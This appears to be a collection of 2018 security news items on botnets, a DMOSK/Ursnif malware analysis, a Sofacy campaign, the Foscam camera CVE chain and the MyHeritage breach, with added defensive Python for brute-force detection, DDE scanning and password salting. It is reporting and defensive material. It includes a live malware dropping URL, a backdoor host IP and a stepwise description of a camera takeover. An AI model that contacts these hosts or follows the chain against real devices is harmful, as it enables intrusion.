The Content Security Policy (CSP) header allows website administrators to add an extra layer of security to a given web page by letting them control which resources the browser is allowed to load.


Mishandling of CSP headers by your web browser could allow attackers to perform cross-site scripting, clickjacking and other types of code injection attacks on targeted web pages.
The patch for the vulnerability has already been rolled out in the stable Chrome update 67.0.3396.79 for Windows, Mac, and Linux, which users may already have received or will receive over the coming days or weeks.
So, make sure your system is running the updated version of the Chrome web browser. We'll update the article as soon as Google releases further updates.
A new version of the Firefox web browser, 60.0.2, has also been released with security and bug fixes, so users of the stable version of Firefox are also recommended to update their browser.


Prowli Malware Targeting Servers, Routers, and IoT Devices
8.6.2018 thehackernews  IoT 
Virus

After the discovery of the massive VPNFilter botnet, security researchers have now uncovered another giant botnet that has already compromised more than 40,000 servers, modems and internet-connected devices belonging to a large number of organizations across the world.
Dubbed Operation Prowli, the campaign has been spreading malware and injecting malicious code to take over servers and websites around the world using various attack techniques including use of exploits, password brute-forcing and abusing weak configurations.
Discovered by researchers at the GuardiCore security team, Operation Prowli has already hit more than 40,000 victim machines from over 9,000 businesses in various domains, including finance, education and government organisations.


Here's the list of devices and services infected by the Prowli malware:
Drupal and WordPress CMS servers hosting popular websites
Joomla! servers running the K2 extension
Backup servers running HP Data Protector software
DSL modems
Servers with an open SSH port
PhpMyAdmin installations
NFS boxes
Servers with exposed SMB ports
Vulnerable Internet-of-Things (IoT) devices
All the above targets were infected using either a known vulnerability or credential guessing.
Prowli Malware Injects Cryptocurrency Miner

Since the attackers behind Prowli are abusing the infected devices and websites to mine cryptocurrency or to run a script that redirects visitors to malicious websites, researchers believe they are focused on making money rather than on ideology or espionage.
According to GuardiCore researchers, the compromised devices were found infected with a Monero (XMR) cryptocurrency miner and the "r2r2" worm—a malware written in Golang that executes SSH brute-force attacks from the infected devices, allowing the Prowli malware to take over new devices.


In simple words, "r2r2 randomly generates IP address blocks and iteratively tries to brute force SSH logins with a user and password dictionary. Once it breaks in, it runs a series of commands on the victim," the researchers explain.
These commands are responsible for downloading multiple copies of the worm for different CPU architectures, a cryptocurrency miner and a configuration file from a remote hard-coded server.
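The dictionary brute-forcing described above leaves a characteristic trail in sshd logs: many failures from one source, spread across many user names, in a short window. As an added example (not code from the GuardiCore report or this article), the following Python runs that detection logic over a constructed auth-log excerpt; all addresses and user names in it are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd auth-log excerpt (syslog format, no year). Addresses, hosts and
# user names are made up for this example; they are not indicators from the article.
SAMPLE_AUTH_LOG = """\
Jun  8 10:00:01 host sshd[1201]: Failed password for invalid user admin from 198.51.100.23 port 41022 ssh2
Jun  8 10:00:02 host sshd[1202]: Failed password for root from 198.51.100.23 port 41030 ssh2
Jun  8 10:00:02 host sshd[1203]: Failed password for invalid user test from 198.51.100.23 port 41041 ssh2
Jun  8 10:00:03 host sshd[1204]: Failed password for invalid user oracle from 198.51.100.23 port 41055 ssh2
Jun  8 10:00:04 host sshd[1205]: Failed password for root from 198.51.100.23 port 41060 ssh2
Jun  8 10:00:05 host sshd[1206]: Failed password for invalid user pi from 198.51.100.23 port 41071 ssh2
Jun  8 10:00:09 host sshd[1207]: Accepted publickey for deploy from 192.0.2.10 port 50122 ssh2: ED25519 SHA256:placeholder
Jun  8 10:02:30 host sshd[1208]: Failed password for alice from 192.0.2.10 port 50140 ssh2
Jun  8 10:02:41 host sshd[1209]: Accepted password for alice from 192.0.2.10 port 50141 ssh2
Jun  8 10:05:00 host sshd[1210]: Failed password for root from 203.0.113.7 port 39001 ssh2
Jun  8 10:05:01 host sshd[1211]: Failed password for invalid user admin from 203.0.113.7 port 39002 ssh2
"""

# One pattern covers "Failed password for [invalid user] NAME from IP" and the Accepted variants.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_line(line):
    """Return a dict with ts/result/user/ip for an sshd auth line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine for windowing
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_bruteforce(log_text, window=timedelta(seconds=60), min_failures=5, min_users=3):
    """Flag source IPs that either pack >= min_failures failed logins into one sliding
    window, or try >= min_users distinct user names (the dictionary-walk signature)."""
    failures = defaultdict(list)  # ip -> [(timestamp, user), ...]
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["result"] == "Failed":
            failures[ev["ip"]].append((ev["ts"], ev["user"]))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        users = {u for _, u in events}
        # sliding window: the largest number of failures whose timestamps fit inside `window`
        peak, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= min_failures or len(users) >= min_users:
            alerts[ip] = {"failures": len(events), "peak_in_window": peak, "users": sorted(users)}
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failures']} failures, {info['peak_in_window']} within 60s, users={info['users']}")
```

A single mistyped password from a known host (192.0.2.10 above) stays below both thresholds, which is what keeps the rule usable on a real fleet.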
Attackers Also Trick Users Into Installing Malicious Extensions
Besides the cryptocurrency miner, the attackers are also using a well-known open source webshell called "WSO Web Shell" to modify the compromised servers, eventually allowing them to redirect visitors of websites to fake sites distributing malicious browser extensions.
The GuardiCore team traced the campaign across several networks around the world and found the Prowli campaign associated with different industries.
"Over a period of 3 weeks, we captured dozens of such attacks per day coming from over 180 IPs from a variety of countries and organizations," the researchers said. "These attacks led us to investigate the attackers' infrastructure and discover a wide-ranging operation attacking multiple services."
How to Protect Your Devices From Prowli-like Malware Attacks
Since the attackers are using a mix of known vulnerabilities and credential guessing to compromise devices, users should make sure their systems are patched and up to date and always use strong passwords for their devices.
Moreover, users should also consider locking down systems and segmenting vulnerable or hard-to-secure systems, in order to separate them from the rest of their network.
Late last month, a massive botnet, dubbed VPNFilter, was found infecting half a million routers and storage devices from a wide range of manufacturers in 54 countries with a malware that has capabilities to conduct destructive cyber operations, surveillance and man-in-the-middle attacks.


DMOSK Malware Targeting Italian Companies
8.6.2018 securityaffairs
Virus

The security expert and malware researcher Marco Ramilli published a detailed analysis of a new strain of malware dubbed DMOSK that targets Italian firms.
Today I'd like to share another interesting analysis made by my colleagues and me. It should be a nice and interesting analysis, since it targeted many Italian and European companies. Fortunately, the attacker left the LOG.TXT freely available on the dropping URL, letting us know the IP addresses that clicked on the analyzed first stage (yes, we know the companies that might be infected). Unlike what we did with TaxOlolo, we will not disclose the victims' IP addresses and so the companies that might be infected. National CERTs have been involved and they have been alerted. Since we believe the threat could radically increase its magnitude in the following hours, we decided to write up this quick and dirty analysis focusing on speed rather than on details. So please forgive some quick and undocumented steps.
Everything started with an email (how about that?!). The email we got had the following body.

Attack Path
A simple link to a drive (drive.carlsongracieanaheim.com) begins the first stage of infection. An email address is passed as a parameter to the doc.php script, which records the IP address and the "calling" email address belonging to the victim. The script forces the browser to download a .zip file which, once uncompressed, presents the victim with a JSE file called scan.jse. The file is heavily obfuscated. It was quite difficult to decode the following stage of infection, since the JavaScript was obfuscated through at least 3 different techniques. The following image shows the obfuscated sample.

Second Stage: Obfuscated JSE
Unfortunately, the second stage is not the final one. Indeed, once we de-obfuscated it, we figured out that it was dropping and executing another file having the .SCR mimetype. From this stage it is interesting to observe that only one dropping URL was called. This is strange behaviour; usually attackers use multiple dropping URLs in order to get more chances to infect the victims. The URL found was the following one:
“url”: “https://drive.carlsongracieanaheim.com/x/gate.php”
The JSE file dropped the third stage into \User\User\AppData\Local\Temp\38781520.scr, having the following hash: 77ad9ce32628d213eacf56faebd9b7f53e6e33a1a313b11814265216ca2c4745, which had previously been analysed by 68 AV engines, but only 9 of them recognised it as a malicious generic file. The following image shows the VirusTotal analysis.

Third Stage: Executable SCR file

Unfortunately, we are still not at the end of the infection chain. The third stage drops and executes another payload. It does not download and execute it from a different dropping website; rather, it drops it from a special, crafted memory address (fixed from .txt:0x400000). The following image shows the execution of the fourth stage payload directly from the victim's memory.

Fourth Stage: Dropped PE File
Following the analysis, it has been possible to figure out that the final payload is something very close to Ursnif, which grabs the victim's email information and credentials. The following image shows the temporary file built before sending information out to the Command and Control servers.

Temporary File Before Sending data to Command and Control
Like any other Ursnif, the malware tries to reach a command and control network located both on the clear net and on the TOR network. The following section will expose the recorded IoCs.

An interesting approach adopted by the attackers is blacklisting. We observed at least 3 blacklists. The first one was based on the victim's IP. We guess (but we have no evidence of that) that the attacker would filter responses based on country, in order to make a country-targeted attack possible by blacklisting non-targeted countries. The following image shows the temporary file used to store the victim IP. The attacker could use this information in order to respond or not to a specific malware request.

Temporary File Storing the Victim IP Address

A second blacklist that we found was on the dropping URL web site, which was trained not to drop files to specific IP addresses. The main reasons found to deny the dropped payload were three:
geo (out of geographical scope). The threat is mainly focused on hitting Italy.
asn (internet service providers and/or cloud providers). The threat is mainly focused on clients and not on servers, so it would make no sense to give the payload to cloud providers.
MIT. The attacker does not want the dropped payload to end up with MIT folks; this is quite funny, isn't it?

A small section of the drop-payload blacklist
The blacklists are an interesting approach to reduce the chance of being analyzed; in fact, the blacklisted IPs belong to pretty well-known cybersecurity companies (Yoroi included), which often use specific cloud providers to run emulations and/or sandboxes.
Personal note: this is a reverse targeting attack, where the attacker wants to attack an entire set of victims but not some specific ones, so it introduces a technique for blocking payload delivery. End personal note.
Now that we know how the attack works, let's try to investigate a little what the attacker messed up. For example, let's try to analyse the content of the dropping URL. Quite fun to figure out that the attacker left his private key freely available! I will not disclose it... let's say... out of respect for the attacker (? really ?)

Attacker Private Key !
The public certificate used is the following one:

Attacker Certificate
By decoding the fake certificate, the analyst would obtain the following information; of course, none of this information is valuable, but it makes for a nice bit of analysis.

Common Name: test.dmosk.local
Organization: Global Security
Organization Unit: IT Department
Locality: SPb
State: SPb
Country: RU
Valid From: June 5, 2018
Valid To: June 5, 2022
Issuer: Global Security
Serial Number: 12542837396936657430 (0xae111c285fe50a16)

Maybe the most "original" string in the entire malware analysis, in the sense of being written by the attacker without thinking too much, is the string 'dmosk' (in the decoded certificate); from here comes the malware name.
As of today we observed 6617 email addresses that could potentially be compromised, since they clicked on the first stage (evidence on the dropping URL). We have evidence that many organisations have been hit by this malware, which was able to bypass most of the known security protections since it was behind CloudFlare and had no specific bad reputation. We decided not to disclose the "probably infected" companies. Nationwide CERTs have been alerted (June 7 2018) and together we will contact the "probably infected" companies to help them mitigate the threat.
Please update your rules, signatures and whatever you have to block the infection.
PS: the threat is quite a bit bigger than what I described; there are several additional components, including an APK (Android malware), base ciphers, multi-stage obfuscators and a complete list of "probably infected" users, but again, we decided to encourage notification speed rather than analysis details.
Hope you might find it helpful.
IoC:



Russia-linked Sofacy APT group adopts new tactics and tools in last campaign
8.6.2018 securityaffairs APT

The Sofacy APT group (APT28, Pawn Storm, Fancy Bear, Sednit, Tsar Team, and Strontium) continues to operate and, thanks to rapid and continuous changes of tactics, the hackers are able to remain under the radar.
According to experts from Palo Alto Networks, the hackers also used new tools in recent attacks, and the APT group has recently shifted its focus from NATO member countries and Ukraine towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

Back to the present, the Sofacy APT group is using a new version of the Zebrocy backdoor written in C++, and the attackers adopted the Dynamic Data Exchange (DDE) attack technique to deliver malware.

The DDE attack technique was exploited to deliver payloads such as the Zebrocy backdoor and the open-source penetration testing toolkit Koadic.
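The DDE technique relies on a Word field whose instruction begins with DDE or DDEAUTO, which Word may assemble from several instrText runs. As an added example, not code from the Palo Alto Networks analysis or this article, the following Python scans the XML parts of a .docx for such field instructions, handling both simple fields and fields split across runs; the documents it checks are constructed in memory with placeholder values instead of any real payload.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# A DDE field instruction starts with DDE or DDEAUTO (case-insensitive), possibly after
# leading whitespace. Matching is done on the whole assembled instruction, never on
# a single run, so splitting the keyword across runs does not evade the check.
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def field_instructions(part_xml: bytes):
    """Yield every field instruction in one WordprocessingML part: the w:instr attribute
    of <w:fldSimple>, and the concatenated <w:instrText> runs of complex fields lying
    between <w:fldChar fldCharType="begin"/> and the following "separate" or "end"."""
    root = ET.fromstring(part_xml)
    for fld in root.iter(f"{{{W_NS}}}fldSimple"):
        yield fld.get(f"{{{W_NS}}}instr", "")
    current = None  # list of instrText fragments while inside a complex field
    for elem in root.iter():  # document order
        if elem.tag == f"{{{W_NS}}}fldChar":
            kind = elem.get(f"{{{W_NS}}}fldCharType")
            if kind == "begin":
                current = []
            elif kind in ("separate", "end") and current is not None:
                yield "".join(current)
                current = None
        elif elem.tag == f"{{{W_NS}}}instrText" and current is not None:
            current.append(elem.text or "")


def find_dde_fields(docx_bytes: bytes):
    """Return [(part name, instruction)] for every DDE/DDEAUTO field in the document,
    including headers, footers and footnotes, which also live under word/."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                for instr in field_instructions(zf.read(name)):
                    if DDE_RE.match(instr):
                        hits.append((name, instr.strip()))
            except ET.ParseError:
                continue  # a malformed part is not a field; real triage would log it
    return hits


def build_docx(document_xml: str) -> bytes:
    """Build a minimal .docx-shaped zip in memory (constructed test input, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed benign document: a plain PAGE field.
BENIGN_DOC = (
    f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
    '<w:fldSimple w:instr=" PAGE "><w:r><w:t>1</w:t></w:r></w:fldSimple>'
    "</w:p></w:body></w:document>"
)

# Constructed suspicious document: the keyword is split across two instrText runs and
# the application/topic arguments are placeholders, not a real command.
SPLIT_DDE_DOC = f'''<w:document xmlns:w="{W_NS}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">AUTO "PLACEHOLDER_APP" "PLACEHOLDER_TOPIC" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>Error!</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>'''


if __name__ == "__main__":
    print("benign:", find_dde_fields(build_docx(BENIGN_DOC)))
    print("split DDEAUTO:", find_dde_fields(build_docx(SPLIT_DDE_DOC)))
```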

This is the first time that the Russian APT uses the Koadic tool.

“Following up our most recent Sofacy research in February and March of 2018, we have found a new campaign that uses a lesser known tool widely attributed to the Sofacy group called Zebrocy. Zebrocy is delivered primarily via phishing attacks that contain malicious Microsoft Office documents with macros as well as simple executable file attachments.” reads the analysis published by Palo Alto Networks.

“This third campaign is consistent with two previously reported attack campaigns in terms of targeting: the targets were government organizations dealing with foreign affairs. In this case however the targets were in different geopolitical regions.”

Palo Alto noticed a change in the tactics used by the hackers: instead of targeting a handful of employees within an organization, they sent phishing messages to "an exponentially larger number of individuals" within the same organization.

Attackers obtained the list of individuals' emails with simple queries to search engines; this method is also a novelty for the Sofacy APT group.

The researchers linked this campaign to previous attacks; in February, Palo Alto Networks reported that the Sofacy APT group was hiding its infrastructure using random registrant and service provider information in each attack.

“In our February report, we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities.” continues Palo Alto.

“In that report, we documented our observation that the Sofacy group appeared to use conventional obfuscation techniques to mask their infrastructure attribution by using random registrant and service provider information for each of their attacks. In particular, we noted that the Sofacy group deployed a webpage on each of the domains.”

Sofacy APT

The investigation on this campaign allowed the experts to discover another campaign leveraging the DealersChoice exploit kit and a domain serving the Zebrocy AutoIT downloader.

The version of the Zebrocy downloader delivered by this domain is the new one written in C++; the downloader was used to spread the Delphi backdoor hosted at IP address 185.25.50[.]93.

The experts discovered the following hard-coded user agent being used by many samples of Zebrocy targeting the foreign affairs ministry of a large Central Asian nation:

Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko
The experts found two weaponized Office documents implementing the DDE attack technique; the malicious files were used in attacks against a North American government organization dealing with foreign affairs.

Further details, including IoCs are reported in the analysis published by Palo Alto Networks.


Facebook confirms privacy settings glitch in a new feature exposed private posts of 14 Million users

8.6.2018 securityaffairs Social

Facebook admitted that a bug affecting its platform caused the change of the settings of some 14 million users, potentially exposing their private posts to the public.
This is the worst period in the history of the social network giant that was involved in the Cambridge Analytica privacy scandal that affected at least 87 Million users.

“We recently found a bug that automatically suggested posting publicly when some people were creating their Facebook posts. We have fixed this issue and starting today we are letting everyone affected know and asking them to review any posts they made during that time,” said Erin Egan, Facebook’s chief privacy officer.

“To be clear, this bug did not impact anything people had posted before—and they could still choose their audience just as they always have. We’d like to apologize for this mistake.”

According to Facebook, the glitch affected some of its users that published posts between May 18 and May 27 because in that period of time it was implementing a new feature for the sharing of data such as images and videos.

Evidently, something went wrong, and private posts were shared as public by default.

The social network giant confirmed to have corrected the bug on May 22, but it was unable to change the visibility of all the posts.

The company is now notifying affected users and apologizing for the technical issue.

This is the latest embarrassing case involving Facebook in recent weeks; in April, researchers from Princeton reported that Facebook's authentication feature "Login With Facebook" can be exploited to collect user information that was supposed to be private.

Early this week, Facebook confirmed that its APIs granted access to the data belonging to its users to more than 60 device makers, including Amazon, Apple, Microsoft, Blackberry, and Samsung so that they could implement Facebook messaging functions.

The Chinese vendor Huawei was one of the device makers authorized to use the API; in May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.

Facebook highlighted that the agreement was signed ten years ago and that it operated so as to prevent any abuse of the API.


Multiple models of IP-based cameras from Chinese firm Foscam could be easily hacked. Update the firmware now!
8.6.2018 securityaffairs
Vulnerability

A security vulnerability was discovered in webcams, IP surveillance cameras and also baby monitors manufactured by the Chinese firm Foscam.
The Chinese firm Foscam has released firmware updates to address three vulnerabilities in multiple models of IP-based cameras that could be exploited to take control of vulnerable cameras exposed online.

The following flaws were reported by the experts from IoT security firm VDOO:

CVE-2018-6830
CVE-2018-6831
CVE-2018-6832
By chaining the three flaws, hackers could completely take over the Foscam cameras.

The experts from VDOO have published a technical analysis of the three vulnerabilities, including proof-of-concept code.

“One of the vendors for which we found vulnerable devices was Foscam, when our team discovered a critical chain of vulnerabilities in Foscam security cameras. Combining the discovered vulnerabilities, if an adversary successfully obtains the address of the camera, he can gain root access to the affected cameras remotely (over LAN or the internet).” reads the analysis published by VDOO.

“VDOO has responsibly disclosed these vulnerabilities (CVE-2018-6830, CVE-2018-6831 and CVE-2018-6832) and engaged with Foscam security team to solve the matter.”

Below is the attack scenario described by VDOO on a network-accessible camera:

The attack scenario on a network-accessible camera is as follows:

Step 1: An adversary must first obtain the camera’s IP address or DNS name. It can be achieved in several ways, including:
If the camera and the network are configured by the user such that the camera has direct interface to the internet, its address might be revealed by some internet scanners.
If the adversary gained unauthorized (remote or local) access to a network to which the camera is connected, he might be able to find the local address of the camera.
If dynamic DNS is enabled by the user, the adversary might find a way to resolve the device name.
Step 2: The adversary then uses CVE-2018-6830, an arbitrary file deletion vulnerability, to delete certain critical files that will result in authentication bypass when the webService process reloads.
Step 3: The adversary crashes the webService process by exploiting CVE-2018-6832, a stack-based buffer overflow vulnerability in the webService process. After it crashes, the webService process is automatically restarted by the watchdog daemon, and during the process reload, the changes from step 2 take effect. The adversary is now able to gain administrative credentials.
Step 4: The adversary executes root commands by exploiting CVE-2018-6831. This is a shell command injection vulnerability that requires administrator credentials. Since the adversary gained administrator credentials in the previous stage, he can now use this vulnerability to execute commands as the root user for privilege escalation. Full details appear in the Technical Deep Dive below.
Foscam Internet-connected cameras

In June 2017, experts at F-Secure discovered tens of vulnerabilities in tens of thousands of Internet-connected cameras from China-based manufacturer Foscam, but at the time the Chinese firm ignored the report from the security firm.

The experts published a long list of affected Foscam device models and firmware versions; users are urged to update the firmware as soon as possible.

Likely many other camera models from other vendors could be affected by the vulnerabilities because Foscam also provides its products in white-label mode.


Teen Arrested for Hacking Minnesota Government Systems
7.6.2018 securityweek Crime

The United States Department of Justice this week announced the arrest of an individual charged with the hacking of servers owned by the State of Minnesota.

The suspect, Cameron Thomas Crowley, 19, who uses the online handle of Vigilance, made an initial appearance in court on Tuesday, before United States Magistrate Judge Becky R. Thorson in Saint Paul, Minnesota. He remains in federal custody pending his detention hearing.

In addition to announcing Crowley’s arrest, the Department of Justice revealed a five-count indictment that charges the individual with intentional access to a protected computer, intentional damage to a protected computer, and aggravated identity theft.

The indictment alleges that, between May 28, 2017 and June 17, 2017, Crowley intentionally accessed protected servers owned by the State of Minnesota and other entities, without authorization.

In June last year, Vigilance announced on Twitter the hacking of databases belonging to the Minnesota state government and the theft of over a thousand email addresses and corresponding passwords, all of which were dumped online.

The hacker said at the time the action was the result of a jury finding Jeronimo Yanez, a police officer from St. Anthony, Minnesota, not guilty of manslaughter after he shot and killed African-American Philando Castile during a seemingly routine traffic stop in the summer of 2016.

Castile, 32, was shot seven times when he tried to reach for his ID, after he told Yanez he had a gun and a license to carry it. Castile was in the car with his girlfriend and their 4-year-old daughter.

Crowley is also charged with transmitting programs, code, and commands to the compromised servers, causing damage that led to a loss to the State of Minnesota of more than $5,000.

Thus, the alleged hacker is charged with three counts of intentional access to a protected computer and one count of intentional damage to a protected computer. Additionally, the indictment charges Crowley with one count of aggravated identity theft.

The investigation into this case is conducted by the Federal Bureau of Investigation and the Minnesota Bureau of Criminal Apprehension.


92 Million User Credentials Exposed in MyHeritage Data Breach
7.6.2018 securityweek Incident

[Updated] MyHeritage, a DNA and genealogy firm, announced Monday that the access credentials of 92 million users had been stolen. It only discovered the breach when a security researcher informed the company he had found a file named myheritage stored outside of MyHeritage.

The file contains, writes MyHeritage CISO Omer Deutsch in a statement, "the email addresses and hashed passwords of 92,283,889 users who had signed up to MyHeritage up to and including Oct 26, 2017 which is the date of the breach." He stresses that the passwords are stored as "a one-way hash of each password, in which the hash key differs for each customer" (possibly implying that each password is hashed with a unique salt).

Deutsch believes that only the credentials were stolen. "We have no reason to believe that any other MyHeritage systems were compromised." Furthermore, he adds, "we have not seen any activity indicating that any MyHeritage accounts had been compromised." Payment data, user DNA data and family trees have not been affected.

MyHeritage went public with commendable speed – on the same day it learnt of the breach. However, some aspects of the statement are concerning. For example, it immediately set up an incident response team to investigate the incident. Best practice would have such a team already established in anticipation of a breach.

The firm is expediting "work on the upcoming two-factor authentication feature that we will make available to all MyHeritage users soon." Best practice would have had MFA in place long ago. Furthermore, it will 'recommend' rather than require users to employ the MFA option. It also recommends users should change their passwords, when it should perhaps force a password reset on all users.

"It appears that MyHeritage hasn't taken the steps to automatically require users to change passwords, just that they recommend they do," comments Absolute Software's Global Security Strategist Richard Henderson. "That should be an immediate action for any breach of this type. We still don't know (and neither do they) how this information was stolen, or the motives for doing so... and the statement by MyHeritage that they believe no other data was taken, especially unique DNA information and genealogy information, is probably a little premature, until they can determine exactly what happened late last October."

The reassuring tone of the MyHeritage statement is also challenged by Anthony James, CMO of CipherCloud. "Don't believe for a second that a hashed password is safe," he says. "Hashed passwords are absolutely not safe if stolen – these hashed passwords are still highly vulnerable to a dictionary attack, where the attacker runs a hash function against the top 100,000 most popular passwords and computes the hash function against all of them. Then all they need do is compare these calculated values to the list stolen from MyHeritage. So, NO, a smart cyber-attacker could be working diligently, even now, to map the hashed values to real passwords and break the accounts."

The unknown quality of the hashing function could make the credential cracking more difficult, but not necessarily impossible. Furthermore, it may not be necessary if the user has had the same password with the same email address stolen in a different breach with a weak hash function. SecurityWeek has contacted MyHeritage asking for further details on the hashing process, and will update this report with any response.
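Why the per-customer "hash key" matters: against a store of unsalted fast hashes, one precomputed table of common-password hashes resolves every matching account by lookup, whereas a per-user salt forces the work to be redone for each account and a slow KDF makes each redo expensive. As an added example, not code from MyHeritage or this article, the following Python contrasts the two schemes on constructed accounts; the word list and passwords are made up, and the PBKDF2 iteration count is an illustrative assumption.

```python
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumed work factor; size this to the login hardware


def unsalted_sha256(password: str) -> str:
    """The weak scheme: one fast hash, no salt. Equal passwords give equal hashes,
    so one table of hashed common words matches every account that uses them."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_record(password: str, iterations: int = PBKDF2_ITERATIONS) -> dict:
    """The per-customer scheme: a random 16-byte salt per account plus a slow KDF.
    Returns exactly what would be stored; the salt is not secret, only unique."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": digest.hex()}


def verify(record: dict, candidate: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    digest = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(record["salt"]), record["iterations"]
    )
    return hmac.compare_digest(digest.hex(), record["hash"])


# Constructed stand-in for the "top 100,000 most popular passwords" list quoted above.
COMMON_WORDS = ["password", "123456", "qwerty", "letmein"]


def precomputed_table(words) -> dict:
    """Hash the word list once; with no salt this table is reusable against any dump."""
    return {unsalted_sha256(w): w for w in words}


def lookup_hits(stored_hashes, table: dict) -> int:
    """Number of stored hashes that a precomputed table resolves by plain lookup."""
    return sum(1 for h in stored_hashes if h in table)


def compare_schemes(passwords, iterations: int = PBKDF2_ITERATIONS):
    """Store the same constructed passwords both ways and count table lookups that succeed.
    Salted records yield zero lookup hits: each account must be attacked separately,
    at `iterations` PBKDF2 rounds per guess, instead of amortised across the whole dump."""
    table = precomputed_table(COMMON_WORDS)
    unsalted = [unsalted_sha256(p) for p in passwords]
    salted = [make_record(p, iterations)["hash"] for p in passwords]
    return lookup_hits(unsalted, table), lookup_hits(salted, table)


if __name__ == "__main__":
    accounts = ["password", "qwerty", "correct horse battery staple"]  # constructed
    weak, strong = compare_schemes(accounts, iterations=10_000)
    print(f"unsalted sha256: {weak}/{len(accounts)} accounts resolved by one table lookup")
    print(f"salted PBKDF2:   {strong}/{len(accounts)} accounts resolved by the same table")
```

Salting does not rescue a weak password on its own: a guess that is cheap to check per account still falls, which is why the article's point about forcing a reset still stands.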

Rick Moy, CMO at Acalvio, is concerned that MyHeritage did not itself detect the intrusion, "as demonstrated by the seven-month delay, and the fact they were alerted by a third party." The implication is that the firm does not have adequate detection capabilities – and if it failed to detect this, there may be other incidents with the other systems that have also gone undetected.

This possibility also concerns Rashmi Knowles, EMEA Field CTO at RSA Security. "If your password is stolen, it can be updated, but this isn't the case with genetic information," she warns. "You only have one genetic identity, so if this is stolen there are potentially much more serious consequences. But many people don't think about this when applying for such services. No matter how secure the organization, no one is completely risk-free, and if breached, genetic data could be sold on to other hackers without your consent, or the characteristic data it contains could be used to hijack your online accounts. There's even a possibility that hackers can amend or even delete genetic data in some cases, which could have serious implications for the victim and the level of healthcare or even health insurance they could access in the future."

There is potentially an additional side-story to this incident. MyHeritage reports, "We are taking steps to inform relevant authorities including as per GDPR." SecurityWeek has asked MyHeritage to expand on this. Who are the relevant GDPR authorities for MyHeritage?

The firm lists numerous contact phone numbers in various European countries, including the provision of "24/7 support" from the Irish phone. This suggests that the Irish regulator may be the relevant GDPR authority for MyHeritage. There is little doubt that MyHeritage is liable under GDPR, and it seems that it is reachable by the GDPR authorities via its European offices. The only question here is whether Europe will decide to make a high-profile example of MyHeritage early into the GDPR age.

But what about the researcher? Is he or she also liable under GDPR for unsanctioned storage of and access to European PII? It is a moot point. The UK's Information Commissioner's Office has told SecurityWeek that researchers are exempt from GDPR under the principle of 'legitimate interest'.

This is not the view of David Flint, senior partner at MacRoberts LLP. Asked if researchers should be concerned about GDPR, he told SecurityWeek, "The short answer is YES! Under the GDPR/DPA 2018 the researcher couldn't be a Processor (as he is not acting on instructions of a Controller) therefore he must be a Controller."

So, as a controller, "If a researcher comes across that data he should advise all the Data Subjects that he has the data and what he intends to do with it, sending them a Privacy Notice. (article 14). Article 89 GDPR deals with an exemption for historical research which doesn't seem relevant here."

These are interesting times. MyHeritage users will need to wait to see if their DNA has been or may be compromised, researchers will need to wait to see if GDPR may be enforced against them; and businesses around the world – including MyHeritage – will be waiting to see how forcefully GDPR will be enforced by the European Union.

Update

In a new blog posted Wednesday, MyHeritage has announced that it will be retiring all existing MyHeritage passwords. "To maximize the security of our users, we have started the process of expiring ALL user passwords on MyHeritage," writes CISO Omer Deutsch. "This process will take place over the next few days. It will include all 92.3 million affected user accounts plus all 4 million additional accounts that have signed up to MyHeritage after the breach date of October 26, 2017. As of now, we’ve already expired the passwords of more than half of the user accounts on MyHeritage. Users whose passwords were expired are forced to set a new password and will not be able to access their account and data on MyHeritage until they complete this."


ALTR Emerges From Stealth With Blockchain-Based Data Security Solution
7.6.2018 securityweek Security

Austin, Texas-based ALTR emerged from stealth mode on Wednesday with a blockchain-based data security platform and $15 million in funding.

ALTR announced the immediate availability of its product, which has been in development for nearly four years while the company operated in stealth mode.

